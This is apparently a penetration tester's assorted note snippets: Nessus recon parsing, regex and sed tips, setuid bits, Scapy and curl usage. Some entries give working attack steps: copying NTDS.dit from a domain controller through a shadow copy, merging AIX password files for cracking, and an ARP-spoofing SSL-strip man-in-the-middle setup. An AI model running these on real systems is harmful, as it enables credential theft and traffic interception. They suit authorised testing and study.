ddouhine

#use to speed up recon when targeting large ip ranges
1. scan targets with nessus
2. filter using #10107 plugin
3. save html report
4. extract urls using this:
#extract IP
grep "<H2 style=\"COLOR" nessus_10107.html | awk -F ">" '{print $2}' > col1
#extract ports
grep ")</H2><SPAN class=" nessus_10107.html | awk -F "/" '{print $2}' | awk -F ")" '{print $1}' > col2
#merge IP:ports

ddouhine

Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file.
This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data.
The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY.
To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file.

Extract NTDS/SYSTEM from a domain controller:
    net start vss
    vssadmin create shadow /for=c:
    vssadmin list shadows
    copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp

ddouhine

grep : /etc/security/passwd > pt1; grep passw passwd | awk '{print $3}' > pt2; paste -d' ' pt1 pt2 > pt3; sed -e 's/ //g' pt3 > passwd_w_shadow; rm pt*

ddouhine

GWT support (according to the vendors):
Acunetix
NTOSpider
WebInspect
AppScan
ZAP

Tested:
Burp + Gwtscan.jar: works ~
GWT-Penetration-Testing-Toolset:

ddouhine

setuid	(4000)	
---s------		allow owner rights temporarily (eg: mount)
chmod 4755 :
-rwxr-xr-x
-rwsr-xr-x

setgid	(2000)	
------s---		allow owner group rights temporarily
chmod 2744 :
-rwxr--r--

ddouhine

^ (Caret)        =    match expression at the start of a line, as in ^A.
$ (Question)     =    match expression at the end of a line, as in A$.
\ (Back Slash)   =    turn off the special meaning of the next character, as in \^.
[ ] (Brackets)   =    match any one of the enclosed characters, as in [aeiou].
                      Use Hyphen "-" for a range, as in [0-9].
[^ ]             =    match any one character except those enclosed in [ ], as in [^0-9].
. (Period)       =    match a single character of any value, except end of line.
* (Asterisk)     =    match zero or more of the preceding character or expression.
\{x,y\}          =    match x to y occurrences of the preceding.
\{x\}            =    match exactly x occurrences of the preceding.

ddouhine

replace:
sed -e 's/oldtext/newtext/g'

Removing the last three characters from every filename
cat files | sed 's/\(.*\).../\1/'

Removing first character from each filename/string
cat files |sed 's/.\(.*\)/\1/'

Removing last character from each filename/string

ddouhine

echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listen-port>
./ssltrip.py  -l <listen-port>
arpspoof -i eth0 -t <target_IP> <gateway_IP>

ddouhine

conf
show_interfaces()
conf.iface="eth1"
conf.color_theme=RastaTheme()
load_session("/var/session")
save_session("/var/session")

ls(IP)
a=IP(dst="192.168.0.1")
c=TCP(dport="25")

ddouhine

wget --header "Cookie: chocolate=AKAR6yG2ZFQo5N6I9ONSmygsW0f" --header "User-Agent: Mozilla/4.0" --header "Accept: text/html" -i url.txt -p

write output in a file:
curl http://1.1.1.1 -o output

change UserAgent:
curl -A "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" http://1.1.1.1

http-ntlm auth:
curl --ntlm -u 'DOMAIN\user:passwd' http://1.1.1.1